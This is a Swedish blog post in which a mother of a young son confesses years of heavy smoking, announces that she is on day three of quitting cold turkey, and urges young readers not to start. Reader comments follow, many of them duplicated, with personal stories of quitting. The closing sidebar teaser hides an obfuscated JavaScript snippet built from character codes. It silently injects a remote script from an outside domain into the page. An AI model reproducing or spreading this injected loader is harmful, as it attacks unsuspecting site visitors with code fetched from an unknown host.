Veckans bikt! Från Storrökare – ickerökare! Dag 3

imagehej igen! Åhhhhhh! Jag klättrar på väggarna! Ja håller på att bli tokig! Som ni såg på mitt förra inlägg så hämtade jag hem en krasslig Ludvig, nån timme efter att jag lämnat honom till dagmamman. Men anledningen att jag klättrar på väggarna och håller på att tappa förståndet,  beror på någonting annat. Men innan jag erkänner varför så vill jag visa en närbild på mina fina körsbärskvistar som jag tog hem till hallen idag..

imagevårkänsla, tillsammans med en bukett med Avalanche Rosor i ljusa pasteller..

image

 -Vackert! Lilleman mår bra, han är snorig & förkyld, något som vi dragits med båda två i ett par veckor…. Men pigg, & glad som alltid 🙂 Men det är alltid bättre att ta det säkra före det osäkra, såklart.

Varför klättrar fröken Martens på väggarna? 

imageJo… För att jag sedan 13års ålder har varit en rökare! Jag VET om att det inte är bra, jag VET om vad konsekvenserna skulle kunna bli… Och med tanke på att jag inte är en ”dum” tjej, utan tvärtom, ganska skärpt & extremt medveten. Så har jag haft en inre konflikt gällande detta. Jag rökte inte från det att vi planerade Ludvig, & höll självklart uppe hela graviditet & amnings period. Men sen började jag igen. 

Jag har MEDVETET dolt detta på bloggen, alla kort på instagram, även under hela Ensam Mamma söker produktionen… Om någon tar uppe en kamera när jag röker så är jag snabbast på att fimpa, plocka bort paketen & cleana av så att det inte under några omständigheter kommer med på bild! -varför?! Jag förespråkar inte rökning, jag Har inte velat stå för att jag röker.

Jag som för övrigt är en hälsosam person med sund kost & träning & som dessutom påbörjat en lång resa mot ett nyttigare, hälsosammare & sundare liv kan ju knappast stå på ett tidningsomslag med en cigg i mungipan?! 

-hur skulle det se ut?!!!

image

jag vet faktiskt inte vad som fick mig att erkänna detta för er just nu.Egentligen handlar det inte om att jag inte har velat erkänna det för er, jag har knappt velat erkänna det för mig själv…… Men nu vill jag framförallt påtala för att ni som är yngre utav mina läsare,

-Börja inte röka!

Jag har aldrig sett det som ett problem förrän nu! Jag har precis fyllt 27år, när man hör att folk som är yngre än jag själv fått diagnosen KOL, bl.a. Så inser man hur skört livet faktisk är! Jag själv har under alla år gått med i ställningen att ”det drabbar inte mig” Men med en Lilleman på 4år & ett helt liv framför mig, så känns det extremt korkat att slösa bort det pga utav dumheter som cigg! Detta inlägget handlar nog lika mycket om att övertyga mig själv som dig, om jag ska vara helt ärlig…. 

Men några snabba negativa faktorer som får avslöja detta jobbiga inlägg. Extremt negativa faktorer som rökare:

Man luktar alltid rök, dvs sjukt illa!

  Det ger tydliga rynkor & lämnar allt annat än fina spår i ansiktet,

Det är otroligt lätt att urskilja en medelålders kvinna som har rökt hela sitt liv ifrån icke rökarna.. Pga att hon oftast har markerad rynkor runt hela munnen, ett betydligt hesare röst, samt gula missfärgade tänder, naglar, nagelband och en extremt illaluktande andedräkt!

-attraktivt? Nja…. inte direkt! 

För att inte tala om hur DYRT det är,jag betalar 59:-/paketet och då ska jag även passa på att erkänna att jag röker 1,5 paket OM DAGEN!!!  

(= 32302:-/året, minst!) När man tänker på vad dom pengarna skulle kunna utvecklas till på Ludvigs fonder istället så blir det skrämmande verkligt! 

så jag är alltså inte bara en rökare utan en STORrökaren! MEN det är från tre dagar tillbaka ett minne blott! Jag är nu 100%rökfri! Jag är & har alltid varit en ”allt eller inget” tjej, så inte några substitut som plåster, tuggummi eller liknande! Jag har bestämt mig! Jag står i början utav denna resan, Jag kommer att klara det!

-BÄSTA KÄNSLAN! 

Även om jag för stunden mår illa, fruktansvärt illa, en abstinens som håller på att äta upp mig inifrån! Men jag är stark! Så jag där ta mig igenom denna extremt påfrestande period! För sen fortsätta mot nya mål & visioner 😉

Ludvig om aldrig sett mig röka förstår Självklart inte varför hans mamma lider utav extrem abstinens!

Love /en brutalt ärlig My Martens

Ps: Kan jag så kan DU! 😉 Dela gärna detta till någon du tycker borde sluta röka….

35 Komentarer

 1. Min svärfar dog i december pga lungcancer förmodligen fr Rökningen, sen har jag en svärmor som är svårt sjuk i kol, hon kan inte göra mkt förrän det tar stop i andningen..Så fortsätt sluta röka, försök tänk o aktivera dig med annat…
  För det är inte värt o röka, jag skulle personligen vilja gå fram till varenda ungdom som röker o berätta o försöka få dom att sluta…
  Lycka till// Kram

 2. Hej My! Jag har aldrig lämnat en kommentar hos dig,är väldigt dålig på att kommentera på bloggar men nu kände jag att jag bara var tvungen! Jag är 28 år, 3 barnsmamma. Började feströka som tonåring, från 16 års ålder rökte jag dagligen tills jag blev gravid som 19 åring. Höll uppe hela graviditeten och amning sen va jag dum och började igen, blev gravid igen vid 22, slutade röka och höll mig ifrån rökningen under graviditeten och amning sen började jag IGEN! Blev återigen gravid vid 25, och höll mig borta från ciggen till sommarn 2013, dvs ja började igen när yngsta var 1 år! Varför??Under sommaren självklart då det lockar lite extra. Grejen är den att de enda som har vetat om att jag rökt dvs dom jag visat det för är min man och min bror, till andra har jag sagt att jag röker om jag dricker alkohol. Dvs jag har aldrig rökt på arbetstid eller när barnen vart i närheten men istället har jag rökt mycket på kvällarna när jag vart själv. Så himla illa och så pinsamt men ändå har jag ”älskat” varje stund, att röka till en kopp kaffe eller öl när ungarna lagt sig har vart avkoppling för mig! Och jag har tänkt så som dig att cancer, kol mm händer inte mig. Men i somras bestämde jag mig att innan 2014 är slut ska jag fimpa! Tänk om jag en dag skulle bli sjuk och då få veta att det är mitt eget fel att jag inte får spendera tid med barn och möjligen barnbarn, jag hade lessnat på att smyga, att fundera på när har jag möjlighet till att ta nästa cigg osv. Började dra ner på rökningen i november, köpte bara hem ett paket i taget istället för att ha ett lager hemma. I december tog jag sista ciggen och det är bara sååå skönt, jag känner mig som en lite ”bättre” människa. Men jag skulle ljuga om jag sa att jag inte saknar mina cigg till kaffet, och hur ska det gå nästa gång jag får för mig att dricka alkohol? Jag tror att jag alltid kommer att sakna ”känslan ” men jag vet att en cigg efter en periods uppehåll smakar skit och det hindrar mig från att ta en Igen.
  Jag förstår varför du berättar detta nu, du känner ju självklart en stolthet,så känner jag iaf och jag har många gånger vart nära på att säga bara för att jag känner mig så stolt att jag har klarat av att sluta utan att vara gravid, under samma period har ja klarat av att ta ett godis och fika stopp. Kan säga att det tuggas en hel del tuggummi ?
  Lycka till med ditt rökstopp detta klarar du!

 3. mmm gott med drinkar och cigg. Men så ohälsosamt så det finns inte. Jag var storrökare i många, många år. Trodde aldrig jag skulle kunna sluta, men en dag började jag skämmas. Vet inte vart det kom ifrån men började skämmas över att stå på perongen och röka, kände mig utstirrad över att vara en idiot som förstörde min hälsa, min kropp och kände mig osexig bland rökmolnen.
  Jag började trappa ner, började tänka om och undra om det var dags att lägga ner. Några veckor senare la jag av. Helt. Tvärt.
  Borstade tänderna ofta, tuggade tuggummi mycket och använda munsköj, för något jag avskydde alltid, var att röka med ny-ren mun.
  Svårast var kaffe och drinkar, det kan jag sakna än idag. Mentalt kommer du alltid att vara en rökare, när det krisar, när du är som argast eller mest nervös, kommer du mentalt alltid att gå tillbaka till ciggen. Men man klarar av att hålla emot tillslut.
  Lycka till.

 4. Min svärfar dog i december pga lungcancer förmodligen fr Rökningen, sen har jag en svärmor som är svårt sjuk i kol, hon kan inte göra mkt förrän det tar stop i andningen..Så fortsätt sluta röka, försök tänk o aktivera dig med annat…
  För det är inte värt o röka, jag skulle personligen vilja gå fram till varenda ungdom som röker o berätta o försöka få dom att sluta…

  Lycka till// Kram

 5. Hej My! Jag har aldrig lämnat en kommentar hos dig,är väldigt dålig på att kommentera på bloggar men nu kände jag att jag bara var tvungen! Jag är 28 år, 3 barnsmamma. Började feströka som tonåring, från 16 års ålder rökte jag dagligen tills jag blev gravid som 19 åring. Höll uppe hela graviditeten och amning sen va jag dum och började igen, blev gravid igen vid 22, slutade röka och höll mig ifrån rökningen under graviditeten och amning sen började jag IGEN! Blev återigen gravid vid 25, och höll mig borta från ciggen till sommarn 2013, dvs ja började igen när yngsta var 1 år! Varför??Under sommaren självklart då det lockar lite extra. Grejen är den att de enda som har vetat om att jag rökt dvs dom jag visat det för är min man och min bror, till andra har jag sagt att jag röker om jag dricker alkohol. Dvs jag har aldrig rökt på arbetstid eller när barnen vart i närheten men istället har jag rökt mycket på kvällarna när jag vart själv. Så himla illa och så pinsamt men ändå har jag ”älskat” varje stund, att röka till en kopp kaffe eller öl när ungarna lagt sig har vart avkoppling för mig! Och jag har tänkt så som dig att cancer, kol mm händer inte mig. Men i somras bestämde jag mig att innan 2014 är slut ska jag fimpa! Tänk om jag en dag skulle bli sjuk och då få veta att det är mitt eget fel att jag inte får spendera tid med barn och möjligen barnbarn, jag hade lessnat på att smyga, att fundera på när har jag möjlighet till att ta nästa cigg osv. Började dra ner på rökningen i november, köpte bara hem ett paket i taget istället för att ha ett lager hemma. I december tog jag sista ciggen och det är bara sååå skönt, jag känner mig som en lite ”bättre” människa. Men jag skulle ljuga om jag sa att jag inte saknar mina cigg till kaffet, och hur ska det gå nästa gång jag får för mig att dricka alkohol? Jag tror att jag alltid kommer att sakna ”känslan ” men jag vet att en cigg efter en periods uppehåll smakar skit och det hindrar mig från att ta en Igen.
  Jag förstår varför du berättar detta nu, du känner ju självklart en stolthet,så känner jag iaf och jag har många gånger vart nära på att säga bara för att jag känner mig så stolt att jag har klarat av att sluta utan att vara gravid, under samma period har ja klarat av att ta ett godis och fika stopp. Kan säga att det tuggas en hel del tuggummi 😉
  Lycka till med ditt rökstopp detta klarar du!

 6. mmm gott med drinkar och cigg. Men så ohälsosamt så det finns inte. Jag var storrökare i många, många år. Trodde aldrig jag skulle kunna sluta, men en dag började jag skämmas. Vet inte vart det kom ifrån men började skämmas över att stå på perongen och röka, kände mig utstirrad över att vara en idiot som förstörde min hälsa, min kropp och kände mig osexig bland rökmolnen.
  Jag började trappa ner, började tänka om och undra om det var dags att lägga ner. Några veckor senare la jag av. Helt. Tvärt.
  Borstade tänderna ofta, tuggade tuggummi mycket och använda munsköj, för något jag avskydde alltid, var att röka med ny-ren mun.

  Svårast var kaffe och drinkar, det kan jag sakna än idag. Mentalt kommer du alltid att vara en rökare, när det krisar, när du är som argast eller mest nervös, kommer du mentalt alltid att gå tillbaka till ciggen. Men man klarar av att hålla emot tillslut.

  Lycka till.

 7. Har aldrig varit rökare men känner starkt med dig, hoppas att det går bra. Så kul kan det ändå inte vara. Tänk när ditt doftsinne återkommer om ett tag, oj vad du bara kommer att älska doften av dina fina blommor ännu mer. Rosorna på bilden var inte att leka med, ska härma direkt:-) Så kul att få tips från ett proffs!

 8. Har aldrig varit rökare men känner starkt med dig, hoppas att det går bra. Så kul kan det ändå inte vara. Tänk när ditt doftsinne återkommer om ett tag, oj vad du bara kommer att älska doften av dina fina blommor ännu mer. Rosorna på bilden var inte att leka med, ska härma direkt:-) Så kul att få tips från ett proffs!

 9. Heja dig vad du är grym <3 Ett bra beslut som du aldrig kommer ångra ?
  Det kommer du fixa. Skäm bort dig själv med lite annat under tiden, något som du blir glad av. Kramen

 10. Heja dig vad du är grym <3 Ett bra beslut som du aldrig kommer ångra 🙂
  Det kommer du fixa. Skäm bort dig själv med lite annat under tiden, något som du blir glad av. Kramen

 11. hej, den 10 januari var det två år sen som jag fimpade min sista cig och det är så skönt att slippa lukta illa, stressen (att hinna röka först…) mm och mer pengar får jag oxå över. Jag hade rökt i 49 år. Lycka till finns inget att förlora bara att vinna!

 12. hej, den 10 januari var det två år sen som jag fimpade min sista cig och det är så skönt att slippa lukta illa, stressen (att hinna röka först…) mm och mer pengar får jag oxå över. Jag hade rökt i 49 år. Lycka till finns inget att förlora bara att vinna!

 13. Slutade röka för 3,5 år sedan, det bästa jag gjort.
  Körde med plåster i ett par tre veckor, innan jag fick sån nikotinkick att jag fick hjärtflimmer (kändes det som).
  Första 2 veckorna fick jag träningsvärk i käkarna av allt tuggummituggande (vanliga sockerfria) samt att mitt hem har aldrig varit så rent eftersom jag fick städnojja.
  Nu när det gått några år så kan jag ibland sakna själva lugnet som infinner sig när man röker i samband med alkohol, men det mattas av mer och mer. Och så tycker jag att rökare luktar riktigt ruttet vidrigt. Det är verkligen somatt stoppa ner näsan i en överfull fuktig askkopp när man hamnar vid en sån på kommunala färdmedel.
  Slutade röka en gång tidigare och höll upp i ett halvår. Och den niko-kicken när man hållt upp ett tag var inte att leka med. Må-illa-och-vilja-kräkas-döden.
  Några månader efter mitt rökstopp så åkte jag på jordens lunginflammation, och låg faktiskt inlagd i 5 dagar. Hade ca 42 i feber som mest.
  Idag funkar bara 75% av mina lungor, mot normala 85-90%. Varför vet man inte. Lunginflammationen? Rökningen? Född sådan?
  Men lycka till med det bästa beslutet du har tagit i ditt liv.
  All styrka till dig!

 14. Slutade röka för 3,5 år sedan, det bästa jag gjort.
  Körde med plåster i ett par tre veckor, innan jag fick sån nikotinkick att jag fick hjärtflimmer (kändes det som).
  Första 2 veckorna fick jag träningsvärk i käkarna av allt tuggummituggande (vanliga sockerfria) samt att mitt hem har aldrig varit så rent eftersom jag fick städnojja.
  Nu när det gått några år så kan jag ibland sakna själva lugnet som infinner sig när man röker i samband med alkohol, men det mattas av mer och mer. Och så tycker jag att rökare luktar riktigt ruttet vidrigt. Det är verkligen somatt stoppa ner näsan i en överfull fuktig askkopp när man hamnar vid en sån på kommunala färdmedel.
  Slutade röka en gång tidigare och höll upp i ett halvår. Och den niko-kicken när man hållt upp ett tag var inte att leka med. Må-illa-och-vilja-kräkas-döden.
  Några månader efter mitt rökstopp så åkte jag på jordens lunginflammation, och låg faktiskt inlagd i 5 dagar. Hade ca 42 i feber som mest.
  Idag funkar bara 75% av mina lungor, mot normala 85-90%. Varför vet man inte. Lunginflammationen? Rökningen? Född sådan?

  Men lycka till med det bästa beslutet du har tagit i ditt liv.
  All styrka till dig!

 15. Hejja dig, you can do it!
  Jag slutade röka på heltid för 7 år sedan i Februari. Jag slutade feströka för 3 år sen…..
  Ok, jag gick upp i vikt. 15 pannor på 4 månader. Inte kul, men något jag verkligen sket i för jag ville bli rökfri. Alltså, det är det bästa jag gjort. EVER! Jag är så glad och känner mig befriad och idag tycker jag att det är så vidrigt!
  Du har vunnit hälften bara av att du har viljan! Jag slutade också utan tuggummin och sånt, jag bara slutade! Härlig känsla!
  Du klarar det! Du är en stark tjej så det blir inga problem!
  Puss & Kram ❤️

 16. Är idag 43 år och slutade röka för 5,5 år sedan efter att ha rökt sen gymnasietiden, med uppehåll för mina tre graviditeter. Hade försökt flertalet gånger innan men så en kväll fick jag plötsligt för mig; Detta är min sista cig och rökte inte ett bloss(kände inte ens ett sug) på 4 år och hade inga hjälpmedel. Har sedan tagit en festcig ett par gånger bara för att(gud så dumt, kunde slutat i skiten igen) men det har inte varit gott ens.
  Tyckte det lukta illa när jag rökte men nu nästan kräks jag på hur folk luktar.
  Och som nån skrev bara det att slippa den där stressen att man måste hinna röka efter maten, innan mötet mm mm.
  Lycka till My och kämpa på, du kommer att lyckas!!

 17. Hejja dig, you can do it!

  Jag slutade röka på heltid för 7 år sedan i Februari. Jag slutade feströka för 3 år sen…..

  Ok, jag gick upp i vikt. 15 pannor på 4 månader. Inte kul, men något jag verkligen sket i för jag ville bli rökfri. Alltså, det är det bästa jag gjort. EVER! Jag är så glad och känner mig befriad och idag tycker jag att det är så vidrigt!

  Du har vunnit hälften bara av att du har viljan! Jag slutade också utan tuggummin och sånt, jag bara slutade! Härlig känsla!

  Du klarar det! Du är en stark tjej så det blir inga problem!

  Puss & Kram ❤️

 18. Är idag 43 år och slutade röka för 5,5 år sedan efter att ha rökt sen gymnasietiden, med uppehåll för mina tre graviditeter. Hade försökt flertalet gånger innan men så en kväll fick jag plötsligt för mig; Detta är min sista cig och rökte inte ett bloss(kände inte ens ett sug) på 4 år och hade inga hjälpmedel. Har sedan tagit en festcig ett par gånger bara för att(gud så dumt, kunde slutat i skiten igen) men det har inte varit gott ens.
  Tyckte det lukta illa när jag rökte men nu nästan kräks jag på hur folk luktar.
  Och som nån skrev bara det att slippa den där stressen att man måste hinna röka efter maten, innan mötet mm mm.
  Lycka till My och kämpa på, du kommer att lyckas!!

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/